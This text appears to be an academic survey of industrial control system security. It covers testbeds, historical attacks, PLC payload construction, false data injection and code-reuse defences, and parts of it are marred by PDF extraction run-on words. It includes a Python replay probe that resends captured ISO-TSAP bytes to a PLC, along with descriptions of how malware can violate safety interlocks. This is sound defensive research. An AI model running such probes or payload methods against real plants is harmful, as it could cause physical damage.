Distributed control system (DCS): A DCS is an automated control system in which the control elements are distributed throughout the system [13]. The distributed controllers are networked to remotely monitor processes. The DCS can remain operational even if a part of the control system fails. DCSs are often found in continuous and batch production processes which require advanced control and communication with intelligent field devices.
Supervisory control and data acquisition (SCADA): SCADA is a computer system used to monitor and control industrial processes. SCADA monitors and controls field sites spread out over a geographically large area. SCADA systems gather data in real time from remote locations. Supervisory decisions are then made to adjust controls.
Fig. 1. General structure of an ICS. The industrial process data collected at remote sites are sent by field devices such as remote terminal units (RTUs), intelligent electronic devices (IEDs), and programmable logic controllers (PLCs) to the control center through wired and wireless links. The control server allows clients to access data using standard protocols. The human-machine interface (HMI) presents processed data to a human operator by querying the time-stamped data accumulated in the data historian. The gathered data are analyzed, and control commands are sent to remote controllers.
B. History of ICS Attacks
In an ICS, stable operation can be disrupted not only by an operator error or a failure at a production unit, but also by a software error/bug, malware, or an intentional cybercriminal attack [14]. In 2014 alone, the ICS Cyber Emergency Response Team (ICS-CERT) responded to 245 incidents. Numerous cyberattacks on ICS are summarized in Fig. 2. We elaborate on four ICS attacks that caused physical damage.
In 2007, Idaho National Laboratory staged the Aurora attack in order to demonstrate how a cyberattack could destroy physical components of the electric grid [15]. The attacker gained access to the control network of a diesel generator. Then a malicious computer program was run to rapidly open and close the circuit breakers of the generator, out of phase with the rest of the grid, resulting in an explosion of the diesel generator. Since most of the grid equipment uses legacy communications protocols that did not consider security, this vulnerability is of special concern [16].
In 2008, a pipeline in Turkey was hit by a powerful explosion, spilling over 30,000 barrels of oil in an area above a water aquifer. Further, it cost British Petroleum $5 million a day in transit tariffs. The attackers entered the system by exploiting vulnerabilities in the wireless camera communication software, and then moved deep into the internal network. The attackers tampered with the units used to alert the control room about malfunctions and leaks, and compromised PLCs at valve stations to increase the pressure in the pipeline, causing the explosion.
In 2010, the Stuxnet computer worm infected PLCs in 14 industrial sites in Iran, including a uranium enrichment plant [4], [17]. It was introduced to the target system via an infected USB flash drive. Stuxnet then stealthily propagated through the network by infecting removable drives, copying itself to shared network resources, and exploiting unpatched vulnerabilities. The infected computers were instructed to connect to an external command and control server. The central server then reprogrammed the PLCs to modify the operation of the centrifuges, causing them to tear themselves apart [18].
In 2015, two hackers demonstrated remote control of a vehicle [19]. The zero-day exploit gave the hackers wireless control of the vehicle. Software vulnerabilities in the vehicle entertainment system allowed the hackers to control it remotely, including dashboard functions, steering, brakes, and transmission, enabling malicious actions such as controlling the air conditioner and audio, disabling the engine and the brakes, and commandeering the wheel [20]. This is a harbinger of attacks in an automated manufacturing environment where intelligent robots cohabitate and coordinate with humans.
C. Roadmap of This Paper
Cybersecurity assessment can reveal the obvious and nonobvious physical implications of ICS vulnerabilities on the target industrial processes. Cybersecurity assessment of ICSs for physical processes requires capturing the different layers of an ICS architecture. The challenges of creating a vulnerability assessment methodology are discussed in Section II. Cybersecurity assessment of an ICS requires the use of a testbed.
The ICS testbed should help identify cybersecurity vulnerabilities as well as the ability of the ICS to withstand various types of attacks that exploit these vulnerabilities. In addition, the testbed should ensure that critical areas of the ICS are given adequate attention. This way one can lessen the costs of fixing cybersecurity vulnerabilities emerging from flaws in the design of ICS components and the ICS network. ICS testbeds are discussed in Section II. A discussion of how one can construct attack vectors appears in Section III. Attacks on ICSs have devastating physical consequences. Therefore, ICSs need to be designed for security robustness and tested prior to deployment. Control protocols should be fitted with security features and policies. ICSs should be reinforced by isolating critical operations and by removing unnecessary services and applications from ICS components. An extensive discussion on vulnerability mitigation appears in Section IV, followed by final remarks in Section V.
II. ICS VULNERABILITY ASSESSMENT
In this section, we review the different layers in an ICS and the vulnerability assessment process outlining the cybersecurity assessment strategy, and discuss ICS testbeds for accurate vulnerability analyses in a lab environment.
A. The ICS Architecture and Vulnerabilities
The different layers of the ICS architecture are shown in Fig. 3.
1) Hardware Layer: Embedded components such as PLCs and RTUs are hardware modules executing software. Hardware attacks such as fault injection and backdoors can be introduced into these modules. These vulnerabilities in the hardware can be exploited by adversaries to gain access to stored information or to deny services. Hardware-level vulnerabilities concern the entire lifecycle of an ICS, from design to disposal. Security in the processor supply chain is a major issue, since hardware trojans can be injected at any stage of the supply chain, introducing potential risks such as loss of reliability and security [21], [22]. Unauthorized users can use JTAG ports intended for in-circuit test to steal intellectual property, modify firmware, and reverse engineer logic [23]-[25]. Peripherals also introduce vulnerabilities. For example, malicious USB drives can redirect communications by changing DNS settings or destroy the circuit board [26], [27]. Expansion cards, memory units, and communication ports pose a security threat as well [28]-[30].
Fig. 2. Timeline of cyberattacks on ICS and their physical impacts.
2) Firmware Layer: The firmware resides between the hardware and software. It includes data and instructions able to control the hardware. The functionality of firmware ranges from booting the hardware and providing runtime services to loading an operating system (OS). Due to the real-time constraints related to the operation of ICSs, firmware-driven systems typically adopt a real-time operating system (RTOS) such as VxWorks. In any case, vulnerabilities within the firmware could be exploited by adversaries to abnormally affect the ICS process. A recent study exploited vulnerabilities in a wireless access point and a recloser controller firmware [31]. Malicious firmware can be distributed from a central system in an
advanced metering infrastructure (AMI) to smart meters [32]. Clearly, vulnerabilities in firmware can be used to launch DoS attacks that disrupt the ICS operation.
Fig. 3. Layered ICS architecture and the vulnerable components in the ICS stack.
3) Software Layer: ICSs employ a variety of software platforms and applications, and vulnerabilities in the software base may range from simple coding errors to poor implementation of access control mechanisms. According to ICS-CERT, the highest percentage of vulnerabilities in ICS products is improper input validation by ICS software, also known as the buffer overflow vulnerability [33]. Poor management of credentials and authentication weaknesses are second and third, respectively. These vulnerabilities in the implementation of software interfaces (e.g., the HMI) and server configurations may have fatal consequences for the control functionality of an ICS. For instance, a proprietary industrial automation software package for historian servers had a heap buffer overflow vulnerability that could potentially lead to a Stuxnet-type attack [34]. Sophisticated malware often incorporates both hardware and software. WebGL vulnerabilities are an example of hardware-enabled software attacks: access to GPU graphics hardware by a least-privileged remote party results in the exposure of GPU memory contents from previous workloads [35]. The implementation of the software layer in a HIL testbed should reflect how each component added to the ICS increases the attack surface.
4) Network Layer: Vulnerabilities can be introduced into the ICS network in different ways [1]: a) firewalls (which protect devices on a network by monitoring and controlling communication packets using filtering policies); b) modems (which convert between serial digital data and a signal suitable for transmission over a telephone line to allow devices to communicate); c) the fieldbus network (which links sensors and other devices to a PLC or other controller); d) communications systems and routers (which transfer messages between two networks); e) remote access points (which remotely configure ICS and access process data); and f) protocols and the control network (which connect the supervisory control level to lower level control modules). DCS and SCADA servers communicating with lower level control devices often are not configured properly and not patched systematically, and hence are vulnerable to emerging threats [36]. When designing a network architecture for an ICS, one should separate the ICS network from the corporate network. In case the networks must be connected, only minimal connections should be allowed, and the connection must be through a firewall and a DMZ.
5) Process Layer: All the aforementioned ICS layers interact to implement the target ICS processes. The observed dynamic behavior of the ICS processes must follow the dynamic process characteristics based on the designed ICS model [37].
ICS process-centric attacks may inject spurious or incorrect information (through specially crafted messages) to degrade performance or to hamper the efficiency of the controlled process [33]. Process-centric attacks may also disturb the process state (e.g., crash or halt) by modifying runtime process variables or the control logic. These attacks can deny service or change the industrial process without operator knowledge. Therefore, it is imperative to determine whether variations in the system process are nominal consequences of expected operation or signal an anomaly/attack. Process-centric/process-aware vulnerability analysis can contribute to practices that enable ICS processes to function in a secure manner. The vulnerabilities related to the information flow (e.g., dependencies on hardware/software/network equipment with a single point of failure) must be determined. The HIL testbed should properly emulate the target process in order to effectively assess and mitigate process-centric attacks [38].
B. ICS Vulnerability Assessment
Fig. 4 presents the steps in the security assessment process, whose aim is to identify security weaknesses and potential risks in ICSs. Due to the real-world consequences of ICS, security assessment of ICSs must account for all possible operating conditions of each ICS component. Additionally, since ICS equipment can be more fragile than standard IT systems, the security assessment should take into consideration the sensitive ICS dependencies and connectivity [39].
Fig. 4. Security assessment of ICS.
1) Document Analysis: The first step in assessing any ICS is to characterize the different parts of its architecture. This includes gathering and analyzing information in order to understand the behavior of each ICS component. For example, analyzing the features of IEDs used in power systems, such as a relay controller, entails collecting information about its communication, functionality, default configuration passwords, and supported protocols [40].
2) Mission and Asset Prioritization: Prioritizing the missions and assets of the ICS is the next step in security assessment. Resources must be allocated based on the purpose and sensitivity of each function. Demilitarized zones (DMZs), for instance, can be used to add a layer of security to the ICS network by isolating the ICS and corporate networks [41]. Selecting DMZs is an important task in this phase.
3) Vulnerability Extrapolation: Next, the ICS should be examined for security vulnerabilities, to identify sources of vulnerability, and to establish attack vectors [42]. Design weaknesses and security vulnerabilities in critical authentication, application and communication security components should be investigated. The attack vectors should comprehensively describe the targeted components and the attack technique.
4) Assessment Environment: Depending on the type of industry and level of abstraction, assessment actions must be defined [37].
For example, in cases where only software is used, the test vectors should address as many physical and cyber characteristics of the ICS as possible. By modeling and simulating individual ICS modules, the behavior of the system is emulated with regard to how the ICS and its internal functions react. Due to the complexity and real-time requirements of ICSs, hardware-in-the-loop (HIL) simulation is more efficient for testing system resiliency against the developed attack vectors [43]. HIL simulation adds the ICS complexity to the assessment platform by adding the control system in a loop, as shown in Fig. 5(b). To capture the system dynamics, the physical process is replaced with a simulated plant, including sensors, actuators, and machinery. A well-designed HIL simulator will mimic the actual process behavior as closely as possible. A detailed discussion of developing an assessment environment appears in Section II-C.

Fig. 5. (a) Real ICS environment versus (b) HIL simulation of ICSs.

5) Testing and Impact: The ICS will be tested on the testbed to demonstrate the outcomes of the attacks, including the potential effect on the physical components of the ICS [44]. In addition, the system-level response and the consequences to the overall network can be observed. The results can be used to assess the impact of a cyberattack on the ICS.

6) Vulnerability Remediation: Any weaknesses discovered in the previous steps should be carefully mitigated. This may involve working with vendors [45] and updating network policies [46]. If there is no practical mitigation strategy to address a vulnerability, guidelines should be developed to allow sufficient time to effectively resolve the issue.

7) Validation Testing: The mitigation actions designed to resolve security issues must then be tested. A critical part of this step is to reexamine the ICS and identify weaknesses.

8) Monitoring: Implementing all the previous steps is half the battle. Continuous monitoring and reassessment of the ICS to maintain security is important [47]. Intrusion detection systems (IDSs) can assist in continuously monitoring network traffic and discovering potential threats and vulnerabilities.

C. ICS Testbeds

The assessment environment, i.e., the testbed, affects all the stages of the assessment methodology. Assessment methodologies that include the production environment or testing individual components of the ICS are not relevant. Although these methodologies are effective for IT systems, the uniquely-ICS nature of using data to manipulate physics makes these approaches inherently hazardous. Therefore, we focus on lab-based ICS testbeds. A HIL testbed offers numerous benefits by balancing accuracy and feasibility. In addition, HIL testbeds can be used to train employees and ensure interoperability of the diverse components used in the ICS.

The cyber-physical nature of ICSs presents several challenges in the design and operation of an ICS testbed. The testbed must be able to model the complex behavior of the ICS for both operation and nonoperation conditions. It should address scaling, since the testbed is a scaled-down model of the actual physical ICS. Furthermore, the testbed must accurately represent the ICS in order to support the protocols and standards as well as to generate accurate data. It is also important for the testbed to capture the interaction between legacy and modern ICS. This interaction is important for both security assessment and compatibility testing of the ICS. Numerous other factors should be considered when designing an ICS testbed, including flexibility, interfaces with IT systems, configuration settings, and testing for extreme conditions.

Assessment of ICS using software-only testbeds and techniques is not frequently adopted. Software models and simulations cannot recreate real-world conditions, since they include only one layer of the complex ICS architecture. Furthermore, the software models cannot include every possible cyber-physical system state of the ICS [48]. Software-only testbeds are also limited by the supported hardware. In addition, the limitations of the computational features supported by the software simulator might introduce delays, simplifying assumptions, and simple heuristics in the simulator engine (e.g., theoretical implementations of network protocols). Finally, in most cases, a software-only testbed gives the users a false sense of security regarding the accuracy of the simulation results. On the other hand, software-only assessment is advantageous in that one can study the behavior of a system without building it. Scilab and Scicos are two open-source software platforms for design, simulation, and realization of ICSs [49], [50].

It is clear that an ICS testbed requires real hardware in the simulation loop. Such HIL simulation symbiotically relates cyber and physical components [51]. A HIL testbed can simulate real-world interfaces, including interoperable simulations of control infrastructures, distributed computing applications, and communication network protocols.

1) Security Objectives of HIL Testbeds: The primary objective of HIL testbeds is to guide the implementation of cybersecurity within ICSs. In addition, HIL testbeds are essential to determine and resolve security vulnerabilities. The individual components of an appropriate testbed should capture all the ICS layers, and the interactions are shown in Fig. 3.

Equipment and network vulnerabilities can be tested in a protected environment that can facilitate multiple types of ICS scenarios highlighting the several layers of the ICS architecture. For instance, the cybersecurity testbed developed by NIST covers several ICS application scenarios [52]. The Tennessee Eastman scenario covers continuous process control in a chemical plant. The robotic assembly scenario covers discrete dynamic processes with embedded control. The enclave scenario covers wide-area industrial networks in an ICS such as SCADA.
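To make the loop structure of Fig. 5(b) concrete, the sketch below closes a scan-cycle loop between a simulated plant and a controller. It is only an illustration of the architecture: the tank dynamics, controller gains, and setpoint are invented, and in an actual HIL testbed the controller object would be replaced by the physical control hardware reached over an industrial protocol.

```python
# Minimal sketch of the HIL loop in Fig. 5(b): a simulated plant exchanges
# sensor readings and actuator commands with a controller on each scan cycle.
# The controller here is a stand-in; in a HIL testbed it would be a real PLC.

class SimulatedPlant:
    """Simulated physical process (a tank) with one sensor and one actuator."""
    def __init__(self, level=5.0, leak=0.1):
        self.level, self.leak = level, leak

    def step(self, valve_opening, dt=1.0):
        inflow = 2.0 * max(0.0, min(1.0, valve_opening))
        self.level += dt * (inflow - self.leak * self.level)
        return self.level                       # sensor reading to controller

class PIController:
    """Stand-in for the real control hardware in the loop."""
    def __init__(self, setpoint=10.0, kp=0.4, ki=0.05):
        self.setpoint, self.kp, self.ki, self.integral = setpoint, kp, ki, 0.0

    def scan_cycle(self, measurement):
        error = self.setpoint - measurement
        self.integral += error
        return self.kp * error + self.ki * self.integral   # actuator command

if __name__ == "__main__":
    plant, controller, command = SimulatedPlant(), PIController(), 0.0
    for cycle in range(30):
        reading = plant.step(command)             # sensor channel
        command = controller.scan_cycle(reading)  # control channel
    print(f"level after 30 cycles: {plant.level:.2f} (setpoint 10.0)")
```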
2) Benefits of a HIL Assessment Methodology: The HIL assessment methodology has the following advantages:

- Flexibility: HIL systems provide reconfigurable architectures for testing several ICS application scenarios (incorporating legacy and modern equipment).
- Simulation: ICS phenomena are simulated faster than complex physical ICS events.
- Accuracy: HIL simulators provide results comparable in accuracy with the live ICS environment.
- Repeatability: the controlled settings in the testbed increase repeatability.
- Cost effectiveness: the combination of hardware and HIL software reduces the implementation costs of the testbed.
- Safety: HIL simulation avoids the hazards present when testing in a live ICS setting.
- Comprehensiveness: it is often possible to assess ICS scenarios over a wider range of operating conditions.
- Modularity: HIL testbeds facilitate linkages with other interfaces and testbeds, integrating multiple types of control components.
- Network integration: protocols and standards can be evaluated, creating an accurate map of networked units and their communication links.
- Nondestructive testing: destructive events can be evaluated (e.g., the Aurora generator test [53]) without causing damage to the real system.
- Hardware security: a HIL testbed allows one to study the hardware security of an ICS, which has become a major concern over the past decade (e.g., side-channel and firmware attacks [44]).

3) Example ICS Testbeds: Over 35 smart grid testbeds have been developed in the United States [54]. The ENEL SPA testbed analyzes attack scenarios and their impact on power plants [55]. It includes a scaled-down physical process, corporate and control networks, DMZs, PLCs, industrial standard software, etc. The Idaho National Laboratory (INL) SCADA Testbed is a large-scale testbed dedicated to ICS cybersecurity assessment, standards improvements, and training [56]. The PowerCyber testbed integrates communication protocols, industry control software, and field devices combined with virtualization platforms, real-time digital simulators (RTDSs), and ISEAGE WAN emulation in order to provide an accurate representation of cyber-physical grid interdependencies [57]. Digital Bond's Project Basecamp demonstrates the fragility and insecurity of SCADA and DCS field devices, such as PLCs and RTUs [58]. New York University (NYU) has developed a smart grid testbed to model the operation of circuit breakers and demonstrate firmware modification attacks on relay controllers [44]. Many hybrid laboratory-scale ICS testbeds exist in research centers and universities [54]. Besides laboratory-scale ICS testbeds with real equipment, many virtual testbeds capable of creating ICS components, including virtual devices and process simulators, are also being developed [59].

Summarizing, given that many ICS attacks exploit vulnerabilities in one or more layers of an ICS, HIL ICS testbeds are becoming standard for security assessment, allowing development and testing of advanced security methods. Additionally, HIL ICS testbeds have been quantitatively shown to produce results close to real-world systems.

III. ATTACKS ON ICSs

An important part of the assessment process is the identification of vulnerabilities in the ICS under test.
In thissection, we present the current and emerging threatlandscapes for ICSs. A. Current ICS Threat Landscape ICSs are vulnerable to traditional computer viruses [60] [62], remote break-ins [63], insider attacks [64],and targeted attacks [65]. Industries affected by ICS at-tacks include nuclear power and refinement of fissile ma-terial [62], [65], transportation [63], [66], electric powerdelivery [67], manufacturin g [60], building automation [64], and space exploration [61]. One class of attacks against ICS involves compromis- ing one or more of its components using traditional at-tacks, e.g., memory exploits, to gain control of thesystems behavior, or access sensitive data related to theprocess. We consider three classes of studies on ICSvulnerabilities. The first considers studies of the secu-rity and security readiness of ICS systems and theiroperators. The second class considers security vulnera- bilities in PLCs. The third class considers vulnerabil- ities in sensors, in this case, focusing on smart electricmeters, an important component of the smart gridinfrastructure. 1) ICS Security Posture: There have been studies of the ICS security posture [68] and the conclusion is thatthere is substantial room for improvement. First, it was f o u n dt h a tI C S sf r e q u e n t l yr e l yo ns e c u r i t yt h r o u g ho b - scurity, due to their history of being proprietary systemsisolated from the Internet. However, use of commodityOS (e.g., Microsoft Windows OS) and open, standardnetwork protocols, have left ICS open not only to mali-cious attacks, but also to coincidental infiltration by In-ternet malware. For example, the slammer worminfected machines belonging to an Ohio nuclear power generation facility. These studies also showed a signifi- cant rise in ICS cybersecuri ty incidents; while only one incident was reported in 2000, ten incidents were re-ported in 2003. Penetration tests of over 100 real-worldICSs over the course of ten years, with emphasis onpower control systems, corroborate these findings [69].Besides identifying vulnerab ilities throughout the ICS,the study shows that in most cases, these ICSs are at least a year behind the standard patch cycle. In some cases, the DMZ separating the ICS from the corporatenetwork had not been updated in years leaving DoS at-tacks trivial. For example, in their evaluation of a net-work connected PLC, it was found that ping floodingwith 6-kB packets was sufficient to render the PLC inop-erable, causing all state to be lost and forcing it to bepower cycled. Another hurdle in improving ICS security are three commonly held myths [70]: 1) security can be achievedthrough obscurity; 2) blindly deploying security tech-nologies improves security; the naive application offirewalls, cryptography, a nd antivirus software often leaves system operators with a false sense of security;and 3) standards compliance yields a secure system;the North-American Energy Reliability Corporations Cy- ber Infrastructure Protection standards [71] have been criticized for giving a false sense of security [72]. 2) Attacks on PLCs: PLCs monitor and manipulate the state of a physical system. A popular Siemens PLC wasshown to have vulnerabilities. The ISO-TSAP protocolused by these PLCs can implement a replay attack due tolack of proper session freshness [73]. It was also possible to bypass the PLC authentication, sufficient to upload payloads as described in Section III-B, and to execute ar-bitrary commands on the PLC. 
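The replay weakness described above can be probed in a testbed without detailed protocol knowledge: if a device accepts and answers a byte-for-byte replay of a previously captured request, the session layer provides no freshness. The sketch below shows such a generic probe; the address, port, and captured bytes are placeholders standing in for values taken from a lab packet capture, and the check is only meaningful against testbed equipment.

```python
# Generic replay probe for missing session freshness (e.g., the ISO-TSAP
# weakness discussed above). Target address, port, and request bytes are
# placeholders for values lifted from a lab packet capture.

import socket

TARGET = ("192.0.2.10", 102)        # placeholder lab device, ISO-TSAP port
CAPTURED_REQUEST = bytes.fromhex(   # placeholder captured request bytes
    "0300001611e00000000100c0010ac1020100c2020102"
)

def replay_once(target, payload, timeout=3.0):
    """Send a previously captured request verbatim and return any response."""
    with socket.create_connection(target, timeout=timeout) as sock:
        sock.sendall(payload)
        try:
            return sock.recv(4096)
        except socket.timeout:
            return b""

if __name__ == "__main__":
    try:
        first = replay_once(TARGET, CAPTURED_REQUEST)
        second = replay_once(TARGET, CAPTURED_REQUEST)
    except OSError as exc:
        raise SystemExit(f"target unreachable (expected with placeholder address): {exc}")
    # Identical answers to a verbatim replay indicate no nonce/sequence binding.
    print("identical responses:", bool(first) and first == second)
```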
The Siemens PLCs used in correctional facilities have vulnerabilities allowing manipulation of cell doors [74].

3) Attacks on Sensors: Another critical element in an ICS is the set of sensors that gather data and relay it back to the control units. Consider smart meters, a widely deployed element of the evolving smart electric grid [75]. A smart meter has the same form factor as a traditional analog electric meter, with a number of enhanced features: time-of-use pricing [76], automated meter reading, power quality monitoring, and remote power disconnect. A security assessment of a real-world smart metering system considered energy theft by tampered measurement values [77]. The system under test allowed undetectable tampering of measurement values both in the meter's persistent storage and in flight, due to a replay attack against the meter-to-utility authentication scheme. A follow-up study examined meters from multiple vendors and found vulnerabilities allowing a single-packet denial-of-service attack against an arbitrary meter, and full control of the remote disconnect switch, enabling a targeted disconnect of the service to a customer [78].

B. Emerging Threats

Here we introduce two new directions for attacks on ICSs. The first constructs payloads targeting an ICS that an adversary may not have full access to. The second class of attacks manipulates sensor inputs to misguide the decisions made by the PLCs.

1) Payload Construction: One type of attack aims to gather intelligence about the victim ICS. For example, the Duqu worm seems to have gathered information about victim systems [79] before relaying it to command and control servers. The other type of attack against ICS aims to influence the physical behavior of the victim system. The best-known example of such an attack is the Stuxnet worm, which manipulated the parameters of a set of centrifuges used for uranium enrichment. Such an attack has two stages: the compromise and the payload. Traditionally, once an adversary has compromised an information system, delivering a preconstructed payload is straightforward. This is because the attacker usually has a copy of the software being attacked. However, for ICSs this is not necessarily the case. Depending on the type of attack the adversary mounts, construction of the payload may be either error prone or nearly impossible. A payload is either indiscriminate or targeted.

An indiscriminate payload performs random attacks causing malicious actions within the machinery of a victim ICS. There are several ways malware can automatically construct indiscriminate payloads upon gaining access to one or more of the victim ICS PLCs [80]. The assumption here is that if the malware is able to write to the PLC code area, then it must also be able to read from the PLC's code area.¹ Given the ability to read the PLC code, several methods may be used to construct indiscriminate payloads.

1) The malware infers basic safety properties known as interlocks [82] and generates a payload which sequentially violates as many safety properties as possible.

2) The malware identifies the main timing loop in the system.
Consider the example of a trafficlight, where the main loop ensures that eachcolor of light is active in sequence for a specificperiod of time. The malware can then constructa payload that violates the timing loop, e.g., by allowing certain lights to overlap. 3) In the bus enumeration technique, the malware uses the standardized identifiers such as Profi-bus IDs to find specific devices within a victimsystem [83]. While these indiscriminate payload construction methods are generic, they have a number of shortcom-ings. First, in the case where the payload is unaware of the actual devices in the victim ICS, one cannot guaran- tee that the resulting payload will cause damage (orachieve any other objective). Second, they cannotguarantee that the resulting payload will be stealthy. Thus, the malicious behavior may be discovered before it becomes problematic. Finally, there is no guarantee thata payload can be constructed at all. If the malware is un-able to infer safety properties, timing loops, or the typesof physical machinery present, then it is not possible toconstruct a payload that exploits them. A targeted payload, on the other hand, attempts to achieve a specific goal within the physical system, such as causing a specific device to operate beyond its safe limits. The alternative is a targeted payload where theadversary is able to arbitrarily inspect the system underattack, i.e., he has a copy of the exploited software. Forautonomous, malware-driven attacks against ICS, this isnot the case. Embedded controllers used in ICS may beair-gapped, meaning that once malware infects them, itmay no longer be able to contact its command and con- trol servers. Additionally, possessing the control logic for a given PLC may not be sufficient to analyze the systemmanually, as the assembly-language-like control logicdoes not reveal which physical devices are controlled bywhich program variables. Malware can construct such atargeted payload against a compromised ICS [84]. Theyassume that the adversary launching the malware has im-perfect knowledge about the physical machinery in the ICS, and is also mostly aware of their interactions. How- ever, the adversary lacks two key pieces of information:1) the complete and precise behavior of the ICS; and2) the mapping between the memory addresses of thevictim PLC and the physical devices in the ICS. Thismapping is important, as often the variable names in aPLC code reveal nothing about the devices theycontrol. Assuming that the attacker can encode his limited knowledge of the victim plant into a temporal logic, aprogram analysis tool called SABOT can analyze the PLCcode, and map behaviors of the memory addresses in thecode to those in the adversary s temporal logic descrip-tion of the system. The results show that by carefullyconstructing the temporal logic description of the sys-t e m ,t h ea d v e r s a r yc a np r o v i d et h em a l w a r ew i t he n o u g h information to construct a targeted payload against most ICS devices. These advances in payload generation defeat one of the main forms of security through obscurity: the inac-cessibility and low-level nature of PLC code. The abilityto generate a payload for a system without ever seeing itscode represents a substantial lowering of the bar for ICSattackers, and thus should be a factor in any assessment methodology. 2) False Data Injection (FDI): In an FDI attack, the ad- versary selects a set of sensors that feed into one ormore controllers. 
The adversary then supplies carefullycrafted malicious values to these sensors, thus achievinga desired result from the controller. For example, if the 1This assumption was confirmed in a study of PLC security mea- sures placed as an ancillary section in an evaluation of a novel security mechanism [81]. The conclusion was that PLC access control policies are all or nothing, meaning that write access implies read access. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1047McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. supplied malicious values tell the controller that a tem- perature is becoming too low, it will increase the setting on a heating element, even if the actual temperature isfine. This will then lead to undetected overheating. The earliest FDI attack targeted power system state estimation [85]. State estimation is an important step indistributed control systems, where the actual physicalstate is estimated based on a number of observables.Power system state estimation determines how electric load is distributed across various high-voltage lines and substations within the power transmission network.Compromising a subset of phasor measurement units(PMUs) can result in incorrect state estimation. Thiswork addressed two questions: 1) Which sensors shouldbe compromised, and how few are sufficient to achievethe desired result? 2) How can the maliciously craftedsensor values bypass the error correction mechanisms built into the state estimation algorithm? By compromis- ing only tens of sensors (out of hundreds or thousands)it is possible to produce inaccurate state estimations inrealistic power system bus topologies. FDI attacks on Kalman-filtering-based state estima- tion has been reported in [86]. Kalman filters are amore general form of state estimation than the linear,direct current (dc) system model. The susceptibility of a Kalman-filter-based state estimator to FDI attacks de- pends on inherent properties of the designed system[86]. The system is only guaranteed to be controllablevia FDI attack if the underlying state transition matrixcontains an unstable eigenvalue, among other condi-tions. This has important implications not only for at-tacks, but also for defenses against FDI attacks, since asystem lacking an unstable eigenvalue may not be per- fectly attacked. IV.MITIGATING ATTACKS ON ICSs In this section, we review the following ICS defenses: software-based mitigation, secure controller architecturesto detect intrusions, and theoretical frameworks to un-derstand the limits of mitigation. A. Software Mitigations Embedded systems software is programmed using na- tive (unsafe) programming languages such as C or assem-bly language. As a consequence, it suffers from memoryexploits, such as buffer overflows. After gaining controlover the program flow the adversary can inject maliciouscode to be executed (code injection [87]), or use existing pieces (gadgets) that are already residing in program memory (e.g., in linked libraries) to implement the de-sired malicious functionalit y (return-oriented program- ming [88]). Moreover, return-oriented programming isTuring complete, i.e., it allo ws an attacker to execute ar- bitrary malicious code. The latter attacks are often re-ferred to as code-reuse attacks since they use benigncode of existing ICS softwar e. 
Code-reuse attacks are prevalent and are applicable to a wide range of comput- ing platforms. The Stuxnet is known to have used code-reuse attacks [89]. Defenses against these attacks focus on either the en- forcing control-flow integrity (CFI) or randomizing thememory layout of an application by means of fine-grained code randomization. We elaborate on these twodefenses. These defenses assume an adversary who is able to overwrite control-flow information in the data area of an application. There is a large body of work thatprevents this initial overwrite; a discussion of these ap-proaches is beyond the scope of this paper. 1) Control-Flow Integrity: This defense technique against code-reuse ensures that an application only exe-cutes according to a predetermined control-flow graph (CFG) [90]. Since code injection and return-oriented pro- gramming result in a deviation of the CFG, CFI detectsand prevents the attack. CFI can be realized as a compilerextension [91] or as a binary rewriting module [90]. CFI has performance overhead caused by control- flow validation instructions. To reduce this overhead, anumber of proposals have been made: kBouncer [92],ROPecker [93], CFI for COTS binaries [94], ROPGuard [95], and CCFIR [96]. These schemes enforce so-called coarse-grained integrity checks to improve performance.For instance, they only constrain function returns to in-structions following a call instruction rather than checkingthe return address against a list of valid return addressesheld on a shadow stack. Unfortunately, this tradeoff be-tween security and performance allows for advancedcode-reuse attacks that stitch together gadgets from call- preceded sequences [97] [100]. Some runtime CFI tech- niques leverage low-level hardware events [101] [103].Another host-based CFI check injects intrusion detectionfunctionality into the monitored program [104]. Until now, the majority of research on CFI has focused on software-based solutions. However, hardware-basedCFI approaches are more efficient. Further, dedicatedhardware CFI instructions allow for system-wide CFI pro- tection using these instructions. The first hardware-based CFI approach [105] realized the original CFI proposal[90] as a CFI state machine in a simulation environmentof the Alpha processor. HAFIX proposes hardware-basedCFI instructions and has been implemented on real hard-ware targeting Intel Siskiyou Peak and SPARC [106],[107]. It generates 2% performance overhead acrossdifferent embedded benchmarks by focusing on pre- venting return-oriented programming attacks exploiting function returns. Remaining Challenges : Most proposed CFI defenses focus on the detection and prevention of return-oriented programming attacks, but do not protect againstreturn-into-libc attacks. This is only natural, becausethe majority of code-reuse attacks require a few 1048 Proceedings of the IEEE | Vol. 104, No. 5, May 2016McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. return-oriented gadgets to initialize registers and prepare memory before calling a system call or critical function. However, Schuster et al. [108] have demonstrated that code-reuse attacks based on only calling a chain of vir-tual methods allow arbitrary m alicious program actions. In addition, it has been demonstrated that pure return-into-libc attacks can achieve Turing completeness [109]. 
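As a language-agnostic illustration of the CFI principle (real CFI is enforced in the compiler or the rewritten binary, not at this level), the toy sketch below checks an observed sequence of indirect control transfers against a whitelist of control-flow graph edges and flags a code-reuse-style transfer to a gadget address; all function names and the gadget address are hypothetical.

```python
# Toy illustration of the CFI principle (not an implementation): observed
# indirect control transfers are checked against the statically allowed
# edges of the program's control-flow graph. Names/addresses are hypothetical.

ALLOWED_EDGES = {                 # CFG edges permitted for indirect transfers
    ("main", "read_sensor"),
    ("main", "update_setpoint"),
    ("read_sensor", "main"),      # legitimate return edge
    ("update_setpoint", "main"),
}

def cfi_check(trace):
    """Return the first transfer that violates the control-flow policy."""
    for src, dst in trace:
        if (src, dst) not in ALLOWED_EDGES:
            return (src, dst)
    return None

benign_trace = [("main", "read_sensor"), ("read_sensor", "main"),
                ("main", "update_setpoint"), ("update_setpoint", "main")]

# A code-reuse attack redirects a return into an existing "gadget" that was
# never a legitimate control-flow target of read_sensor.
hijacked_trace = [("main", "read_sensor"), ("read_sensor", "gadget_0x4F12")]

print("benign  :", cfi_check(benign_trace))      # None -> no violation
print("hijacked:", cfi_check(hijacked_trace))    # first violating edge
```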
